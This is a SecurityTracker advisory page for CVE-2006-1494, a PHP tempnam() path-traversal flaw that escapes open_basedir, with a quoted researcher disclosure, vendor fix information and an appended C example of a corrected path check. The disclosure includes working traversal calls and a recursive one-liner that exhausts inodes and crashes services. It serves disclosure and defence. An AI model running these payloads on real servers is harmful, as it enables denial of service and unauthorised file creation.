SecurityTracker.com
SecurityTracker
Archives

Category: Application (Generic) > PHP
Vendors: PHP Group
PHP tempnam() Argument Error Lets Users Bypass open_basedir Restrictions
SecurityTracker Alert ID:  1015881
SecurityTracker URL:  http://securitytracker.com/id/1015881
CVE Reference:   CVE-2006-1494
Date:  Apr 9 2006
Impact:   Denial of service via local system, Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.4.2, 5.1.2
Description:   A vulnerability was reported in PHP in the tempnam() function. A user can bypass open_basedir restrictions.

A user with the privileges to load arbitrary PHP code can call tempnam() with a specially crafted value for the second (prefix) argument. Only the first (directory) argument is checked against open_basedir; the prefix is not, so a prefix containing '../' components escapes the restriction. When the function is executed, the system creates a temporary file in an arbitrary directory (outside of the basedir specification, but still subject to file system permissions).

This can be exploited to create numerous files on the target system and potentially deny service on the target system.

A demonstration exploit function is provided:

tempnam("/home", "../../../../../../tmp/cx");

Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.

The original advisory is available at:

http://securityreason.com/achievement_securityalert/36

Impact:   A user with the ability to load arbitrary PHP code can bypass open_basedir restrictions and create files on the target system.
Solution:   The vendor has issued a fixed version (5.1.3RC3), available at:

http://www.php.net/downloads.php

Vendor URL:  www.php.net/
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 12 2006 (Red Hat Issues Fix) PHP tempnam() Argument Error Lets Users Bypass open_basedir Restrictions
Red Hat has released a fix for Red Hat Enterprise Linux 3 and 4.
Jul 25 2006 (Red Hat Issues Fix) PHP tempnam() Argument Error Lets Users Bypass open_basedir Restrictions
Red Hat has released a fix for Red Hat Enterprise Linux 2.1.



Source Message Contents

Subject:  [Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2

Source: http://securityreason.com/achievement_securityalert/36

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 26.3.2006
- Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

See http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 
tempnam -- Create file with unique file name

--- 1. tempnam() open_basedir bypass ---
The tempnam() function requires 2 arguments.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

So, if we have open_basedir set to /home, we can't create a file outside the /home 
directory.
In ext/standard/file.c (PHP 4.4.2), lines 550-578:

PHP_FUNCTION(tempnam)
{
	pval **arg1, **arg2;
	char *d;
	char *opened_path;
	char p[64];
	FILE *fp;

	if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
		WRONG_PARAM_COUNT;
	}
	convert_to_string_ex(arg1);
	convert_to_string_ex(arg2);

	/* only arg1 (the dir argument) is checked against open_basedir */
	if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
		RETURN_FALSE;
	}

	d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
	/* arg2 (the prefix) is copied verbatim, directory separators and ".." included */
	strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

	if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
		fclose(fp);
		RETVAL_STRING(opened_path, 0);
	} else {
		RETVAL_FALSE;
	}
	efree(d);
}

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
	RETURN_FALSE;
}

Where is arg2?
So we can write an exploit like:
tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");

tempnam("/home", "../../../../../../tmp/cx");

etc.

It is a low issue but you can try to create a lot of files and use up the inodes 
on the HD. I have one partition.

/var /dev/ad0s1e    1.0G     97M    858M    10%    /var <- Space (B)
/dev/ad0s1e   1012974    94472  837466    10%    3796  137514    3%   /var <- INODES

where mysql and apache try to create some files. When we use up the free inodes, 
the system has big problems with apache and mysql.

Example:

cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free
... etc

/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!

--- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

--- 3. Greets ---

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
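The check the file.c excerpt above leaves out, written as an added example (not PHP's own code and not the fix the project shipped): apply the open_basedir test to the path that will actually be created, dir plus prefix plus random suffix, instead of to the dir argument alone. normalize_path, within_basedir and tempnam_checked are names chosen here; the resolver is purely lexical (it does not follow symlinks), and "XXXXXX" stands in for the random suffix.

```c
#include <stdio.h>
#include <string.h>

/* Lexically resolve "." and ".." in an absolute path (no symlink resolution);
 * the result has no trailing slash and never climbs above "/". */
static void normalize_path(const char *in, char *out, size_t outlen) {
    char buf[1024];
    size_t len = 0;
    strncpy(buf, in, sizeof buf - 1); buf[sizeof buf - 1] = '\0';
    out[0] = '\0';
    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) {       /* drop the last component, if any */
            char *slash = strrchr(out, '/');
            if (slash) { *slash = '\0'; len = strlen(out); }
            continue;
        }
        if (len + strlen(tok) + 2 > outlen) break;   /* stop rather than overflow */
        len += (size_t)snprintf(out + len, outlen - len, "/%s", tok);
    }
    if (out[0] == '\0') strcpy(out, "/");
}

/* 1 if `path` is `base` itself or lies inside it; the component boundary is
 * respected, so "/homeless/x" is not inside "/home". */
int within_basedir(const char *path, const char *base) {
    char p[1024], b[1024];
    normalize_path(path, p, sizeof p);
    normalize_path(base, b, sizeof b);
    size_t bl = strlen(b);
    if (strncmp(p, b, bl) != 0) return 0;
    return bl == 1 || p[bl] == '\0' || p[bl] == '/';   /* bl == 1: base is "/" */
}

/* The check PHP 4.4.2 skipped: compose the name tempnam() would create
 * ("XXXXXX" stands in for the random suffix) and test that composed path,
 * not just `dir`, against open_basedir.  Returns 1 and fills `out` with the
 * normalized target, or 0 if dir or prefix escapes `basedir`. */
int tempnam_checked(const char *basedir, const char *dir, const char *prefix,
                    char *out, size_t outlen) {
    char candidate[1024];
    snprintf(candidate, sizeof candidate, "%s/%sXXXXXX", dir, prefix);
    if (!within_basedir(dir, basedir) || !within_basedir(candidate, basedir))
        return 0;
    normalize_path(candidate, out, outlen);
    return 1;
}
```

With basedir "/home", the advisory's prefix "../../../../../../tmp/cx" composes to "/tmp/cxXXXXXX" and is rejected, while a plain prefix such as "cx" is accepted.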

 
 


Copyright 2019, SecurityGlobal.net LLC